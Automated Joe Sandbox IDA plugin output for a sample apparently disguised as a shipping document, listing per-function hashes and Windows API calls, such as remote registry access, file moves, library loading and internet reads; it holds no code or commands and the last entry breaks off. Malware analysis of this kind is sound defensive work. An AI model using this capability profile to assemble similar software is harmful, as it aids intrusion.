Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: File$Delete$Copy
String ID:
API String ID: 3226157194-0
Opcode ID: 5999e064fea169689e5e4963eb26a3f9e3e6e73e4ad9f0a4f93c7d1ea06f98d8
Instruction ID: f55f538dd9d23c23a5b2ef69fab6c96bdc1f73454ad9fb4857a1789edd5f3e73
Opcode Fuzzy Hash: 5999e064fea169689e5e4963eb26a3f9e3e6e73e4ad9f0a4f93c7d1ea06f98d8
Instruction Fuzzy Hash: 53B18E72E00119ABDF15DBA5CC85EDEBB7DEF49350F0040A6F609E6141EA38AE44EF61

Function 00FCA2AE Relevance: 7.8, APIs: 5, Instructions: 256COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32 ref: 00FCA34E
OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00FCA35C
GetProcessIoCounters.KERNEL32(00000000,?), ref: 00FCA38F
CloseHandle.KERNEL32(?), ref: 00FCA564

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: Process$CloseCountersCurrentHandleOpen
String ID:
API String ID: 3488606520-0
Opcode ID: 09cea9b467d26d3b8a8137594f9e9286f76e55a840f3eda170ace3888e971c41
Instruction ID: 3cd73e8b1b26135dfd53f5bae8ac411ada8923acb3d7386115ec1d52f59fb548
Opcode Fuzzy Hash: 09cea9b467d26d3b8a8137594f9e9286f76e55a840f3eda170ace3888e971c41
Instruction Fuzzy Hash: 1BA1AF716043019FD720DF28C886F2ABBE1AF44714F14885DF9999B392D7B5ED41DB82

Function 00FAE319 Relevance: 7.7, APIs: 5, Instructions: 167filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00FADCFE: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00FACE40,?), ref: 00FADD1B

Part of subcall function 00FADCFE: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00FACE40,?), ref: 00FADD34

Part of subcall function 00FAE0B7: GetFileAttributesW.KERNEL32(?,00FACEB3), ref: 00FAE0B8

lstrcmpiW.KERNEL32(?,?), ref: 00FAE391
MoveFileW.KERNEL32(?,?), ref: 00FAE3CA
_wcslen.LIBCMT ref: 00FAE509
_wcslen.LIBCMT ref: 00FAE521
SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 00FAE56E

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
String ID:
API String ID: 3183298772-0
Opcode ID: 32139a173ca7461d309c6e6918af9b5fefa3a50864f458097f3c968ab77b9496
Instruction ID: 5973abbd108f55d07fe8dc9652a177cb61c3dea63bec3c84fae6733bb8d1dacd
Opcode Fuzzy Hash: 32139a173ca7461d309c6e6918af9b5fefa3a50864f458097f3c968ab77b9496
Instruction Fuzzy Hash: 76516FF24083859BC724EBA4DC819DBB7ECAF85350F00492EF589D3152EF74A688D766

Function 00FCB8F0 Relevance: 7.7, APIs: 5, Instructions: 167registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00F4B606: _wcslen.LIBCMT ref: 00F4B610

Part of subcall function 00FCC8BF: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00FCB5D5,?,?), ref: 00FCC8DC
Part of subcall function 00FCC8BF: _wcslen.LIBCMT ref: 00FCC918
Part of subcall function 00FCC8BF: _wcslen.LIBCMT ref: 00FCC98F
Part of subcall function 00FCC8BF: _wcslen.LIBCMT ref: 00FCC9C5

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00FCB9CC
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00FCBA27
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00FCBA8A
RegCloseKey.ADVAPI32(?,?), ref: 00FCBACD
RegCloseKey.ADVAPI32(00000000), ref: 00FCBADA

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
String ID:
API String ID: 826366716-0
Opcode ID: 7aa2c590586e2ff460670cb72d44be1353f8e4a076e971080cfd1391ad72ecc9
Instruction ID: 78dce1bf4ac979738c2556511db52659538cc5b6f7433f7727cd6a0cfdcf1ae6
Opcode Fuzzy Hash: 7aa2c590586e2ff460670cb72d44be1353f8e4a076e971080cfd1391ad72ecc9
Instruction Fuzzy Hash: 8E61C135108242AFC314DF24C996F26BBE5FF84318F04855DF8998B2A2DB35ED45DB92

Function 00FA8B06 Relevance: 7.7, APIs: 5, Instructions: 159COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00FA8B23
VariantClear.OLEAUT32 ref: 00FA8B94
VariantClear.OLEAUT32 ref: 00FA8BF3
VariantClear.OLEAUT32(?), ref: 00FA8C66
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00FA8C91

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: Variant$Clear$ChangeInitType
String ID:
API String ID: 4136290138-0
Opcode ID: 3028a3629f88b59b7a64301748153b01c18334c59b031827768064f755be7022
Instruction ID: b01892307d6dd60e3d1b55dc86e65c968e6695f820b50265e8c6a5313b37d5e3
Opcode Fuzzy Hash: 3028a3629f88b59b7a64301748153b01c18334c59b031827768064f755be7022
Instruction Fuzzy Hash: 1C517DB1A01219DFCB10CF68C884AAAB7F5FF89350B118569F905DB310E770E911CFA0

Function 00FB8A19 Relevance: 7.6, APIs: 5, Instructions: 143COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00FB8ACC
GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 00FB8AF8
WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00FB8B50
WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00FB8B75
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00FB8B7D

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String
String ID:
API String ID: 2832842796-0
Opcode ID: fc3bab132f0c80201d65aee0db57bdc1391bba3e8ba05e6cac806678e10ce7ec
Instruction ID: 91edb34e41b912b7853e2de370d61c4a0af55d9975cc4e7a8aa329669754de4f
Opcode Fuzzy Hash: fc3bab132f0c80201d65aee0db57bdc1391bba3e8ba05e6cac806678e10ce7ec
Instruction Fuzzy Hash: 8A514C75A002159FCB05EF65C881AADBBF5FF48354F088059E949AB362CB35EC42DF90

Function 00FC8E0B Relevance: 7.6, APIs: 5, Instructions: 143libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(?,00000000,?), ref: 00FC8E67
GetProcAddress.KERNEL32(00000000,?), ref: 00FC8EF7
GetProcAddress.KERNEL32(00000000,00000000), ref: 00FC8F13
GetProcAddress.KERNEL32(00000000,?), ref: 00FC8F59
FreeLibrary.KERNEL32(00000000), ref: 00FC8F79

Part of subcall function 00F5F7A8: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00FB0F61,?,753CE610), ref: 00F5F7C5
Part of subcall function 00F5F7A8: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00F9F94D,00000000,00000000,?,?,00FB0F61,?,753CE610,?,00F9F94D), ref: 00F5F7EC

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
String ID:
API String ID: 666041331-0
Opcode ID: 0ba66e14ff13e28f1712996776f4eb0eb351306fb94aba2de3a3371b5a4760d4
Instruction ID: 0a7001061ebf515b427f124e279da8b4ec0eaf328d74c2ffc95a512603c44731
Opcode Fuzzy Hash: 0ba66e14ff13e28f1712996776f4eb0eb351306fb94aba2de3a3371b5a4760d4
Instruction Fuzzy Hash: 42515B35A01206DFCB01DF68C895E99BBF1FF49364B0480A9E8059B362DB31ED86DB90

Function 00FD6A44 Relevance: 7.6, APIs: 5, Instructions: 131windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(00000002,000000F0,?), ref: 00FD6B01
SetWindowLongW.USER32(?,000000EC,?), ref: 00FD6B18
SendMessageW.USER32(00000002,00001036,00000000,?), ref: 00FD6B41
ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,00FBAA97,00000000,00000000), ref: 00FD6B66
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 00FD6B95

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: Window$Long$MessageSendShow
String ID:
API String ID: 3688381893-0
Opcode ID: ada0b5ace2f8d5ba20674e4f9ac1f6f70dd5da838a640fa8f2243a050a539452
Instruction ID: 99270020699e5eb8b861a2ffc8e224542d25455a45ab99dc8f087a0177dd9a78
Opcode Fuzzy Hash: ada0b5ace2f8d5ba20674e4f9ac1f6f70dd5da838a640fa8f2243a050a539452
Instruction Fuzzy Hash: 6641D235A00105AFD724DF78CC48FA97BA6EB49320F194226F959E73E0C775ED40EA80

Function 00FB3792 Relevance: 7.6, APIs: 5, Instructions: 101windowCOMMON

Download Yara Rule

APIs

GetInputState.USER32 ref: 00FB37E9
TranslateAcceleratorW.USER32(?,00000000,?), ref: 00FB3840
TranslateMessage.USER32(?), ref: 00FB3869
DispatchMessageW.USER32(?), ref: 00FB3873
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00FB3884

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: Message$Translate$AcceleratorDispatchInputPeekState
String ID:
API String ID: 2256411358-0
Opcode ID: c270efca024973601a12e97e12b7cfe2fe16f86415362fa04dcde8fa0582cedd
Instruction ID: 6600019c66fb5d045b8c7b2339ca94c3a4d20dfb91ec9dc739a3399b42935224
Opcode Fuzzy Hash: c270efca024973601a12e97e12b7cfe2fe16f86415362fa04dcde8fa0582cedd
Instruction Fuzzy Hash: AA31EB72D84246EEEB39CB72D809BF237A8AF01314F14445DF596C2090E779D684EF52

Function 00FBCE38 Relevance: 7.6, APIs: 5, Instructions: 93networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,00000000,?,?,?,00FBC13C,00000000), ref: 00FBCE56
InternetReadFile.WININET(?,00000000,?,?), ref: 00FBCE8D
GetLastError.KERNEL32(?,00000000,?,?,?,00FBC13C,00000000), ref: 00FBCED2
SetEvent.KERNEL32(?,?,00000000,?,?,?,00FBC13C,00000000), ref: 00FBCEE6
SetEvent.KERNEL32(?,?,00000000,?,?,?,00FBC13C,00000000), ref: 00FBCF10

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: EventInternet$AvailableDataErrorFileLastQueryRead
String ID:
API String ID: 3191363074-0
Opcode ID: 8af0bcddd7cf70fc12215dffaa29fc1cfd671ac6d1b025770969e420317281cb
Instruction ID: 3d54ce38941b9ae17a5e088bd7557e8420d4550504ad5306858a2cffd4054c12
Opcode Fuzzy Hash: 8af0bcddd7cf70fc12215dffaa29fc1cfd671ac6d1b025770969e420317281cb
Instruction Fuzzy Hash: F3315E72A00209EFDB20DFA6C884AEFB7F9EB04365B10446EE546D2140D734ED45EFA0

Function 00FA1845 Relevance: 7.6, APIs: 5, Instructions: 93sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00FA1859
PostMessageW.USER32(00000001,00000201,00000001), ref: 00FA1905
Sleep.KERNEL32(00000000,?,?,?), ref: 00FA190D
PostMessageW.USER32(00000001,00000202,00000000), ref: 00FA191E
Sleep.KERNEL32(00000000,?,?,?,?), ref: 00FA1926

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: e397094ff0b3015abb957fa96cb1fb0545e6676041a91d932880ac2b3e5bebd3
Instruction ID: 4f165405ca6e86d227d6414443c0fd7eae4ecd739dc01b1efb66f0e461a99af0
Opcode Fuzzy Hash: e397094ff0b3015abb957fa96cb1fb0545e6676041a91d932880ac2b3e5bebd3
Instruction Fuzzy Hash: EC319EB290021DEFDB14CFA8CC89A9E3BB5FB05325F114229F925AB2D1C770D954EB90

Function 00FD563B Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001053,000000FF,?), ref: 00FD567A
SendMessageW.USER32(?,00001074,?,00000001), ref: 00FD56D2
_wcslen.LIBCMT ref: 00FD56E4
_wcslen.LIBCMT ref: 00FD56EF
SendMessageW.USER32(?,00001002,00000000,?), ref: 00FD574B

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: MessageSend$_wcslen
String ID:
API String ID: 763830540-0
Opcode ID: dd4b43e97794cae9991df38e8f4ff11925782e5da562ea181f93996405ad772a
Instruction ID: 71d564329aba6b390f64437c2a0718e8ebe4516408f751d889dc36a7920e62ec
Opcode Fuzzy Hash: dd4b43e97794cae9991df38e8f4ff11925782e5da562ea181f93996405ad772a
Instruction Fuzzy Hash: 5D216571D006189ADB209FA4CC44AEDBBBAFF04B64F148217E919DB284DB74D985EF50

Function 00FC0857 Relevance: 7.6, APIs: 5, Instructions: 69COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 00FC0878
GetForegroundWindow.USER32 ref: 00FC088F
GetDC.USER32(00000000), ref: 00FC08CB
GetPixel.GDI32(00000000,?,00000003), ref: 00FC08D7
ReleaseDC.USER32(00000000,00000003), ref: 00FC090F

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: Window$ForegroundPixelRelease
String ID:
API String ID: 4156661090-0
Opcode ID: d2cfbe2a664f89090d23ebee383f7bd46c770685c4f77d62b114333cb76bfe24
Instruction ID: bdea07aa2f2435e414139e269b53ac6679c2737584a47bbe9f0c9d91cd87fee5
Opcode Fuzzy Hash: d2cfbe2a664f89090d23ebee383f7bd46c770685c4f77d62b114333cb76bfe24
Instruction Fuzzy Hash: 52218135601218EFD704EF65CC85EAA7BE5FF48700B00846DE84A97751CB34AC05EF90

Function 00F7CD5D Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 00F7CD66
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00F7CD89

Part of subcall function 00F737B0: RtlAllocateHeap.NTDLL(00000000,?,00000001,?,00F5FD75,?,?,00F4B63D,00000000,?,?,?,00FB106C,00FDD0D0,?,00F8242E), ref: 00F737E2

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00F7CDAF
_free.LIBCMT ref: 00F7CDC2
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00F7CDD1

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: 4c4fd7a7e321de337d23ece883b8a75bbb35fbf91eb00111a8647f167e09cb97
Instruction ID: b718288efade3049e70a8c1dc1c7f7ef565b2b2b7c18619cc726e6296f02684e
Opcode Fuzzy Hash: 4c4fd7a7e321de337d23ece883b8a75bbb35fbf91eb00111a8647f167e09cb97
Instruction Fuzzy Hash: 9E017573A0261A7F67311A765C48C7B7E6DDBC2B61315813FBA1DC3200DA658C02B1F2

Function 00F5AABF Relevance: 7.6, APIs: 5, Instructions: 66COMMON

Download Yara Rule

APIs

ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00F5AB19
SelectObject.GDI32(?,00000000), ref: 00F5AB28
BeginPath.GDI32(?), ref: 00F5AB3F
SelectObject.GDI32(?,00000000), ref: 00F5AB68

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: 2489fa8ae96107e6fab4daeac088f5fffbd1c74b26f20851f2fa7f4b0145b10c
Instruction ID: 8eb64615e08888641986e3ea08ba13d6234fdeca5077f94cb8be405f826686cd
Opcode Fuzzy Hash: 2489fa8ae96107e6fab4daeac088f5fffbd1c74b26f20851f2fa7f4b0145b10c
Instruction Fuzzy Hash: 3C217F31812309EBDB259F74DD08BA97B67FB40322F104316FA60A60E4D37D98A5EF91

Function 00FA5667 Relevance: 7.6, APIs: 5, Instructions: 61COMMON

Download Yara Rule

APIs

_memcmp.LIBVCRUNTIME ref: 00FA567C
_memcmp.LIBVCRUNTIME ref: 00FA569A
_memcmp.LIBVCRUNTIME ref: 00FA56AD
_memcmp.LIBVCRUNTIME ref: 00FA56C5
_memcmp.LIBVCRUNTIME ref: 00FA56DD

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: 634961e092b37e4358e8718530c593b57c452c38bfdda54b340d05bb3df284f9
Instruction ID: 5f34a0e52b5ad8138990ce58c2a4cddb067d8d99c587834f73409559d9a2709f
Opcode Fuzzy Hash: 634961e092b37e4358e8718530c593b57c452c38bfdda54b340d05bb3df284f9
Instruction Fuzzy Hash: 3C01F9F2A019097BD20066109D42FA6735DBA527A4B584031FD0696340E655FE14B1A5

Function 00F72D88 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00F6F26E,00F737F3,00000001,?,00F5FD75,?,?,00F4B63D,00000000,?,?,?,00FB106C), ref: 00F72D8D
_free.LIBCMT ref: 00F72DC2
_free.LIBCMT ref: 00F72DE9
SetLastError.KERNEL32(00000000), ref: 00F72DF6
SetLastError.KERNEL32(00000000), ref: 00F72DFF

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 2e597e37ef34d5a208256fddc64591c4556668af03da7e766fdfef8c84c9baef
Instruction ID: 6265b68ffeefc09434da0325ed4139f9bb9a2211f141140956163f467a681217
Opcode Fuzzy Hash: 2e597e37ef34d5a208256fddc64591c4556668af03da7e766fdfef8c84c9baef
Instruction Fuzzy Hash: 3D01F932A416027BD67227396C49E2B336AEBC9370B24C12BF52D921C5EE688D427163

Function 00FAE899 Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON

Download Yara Rule

APIs

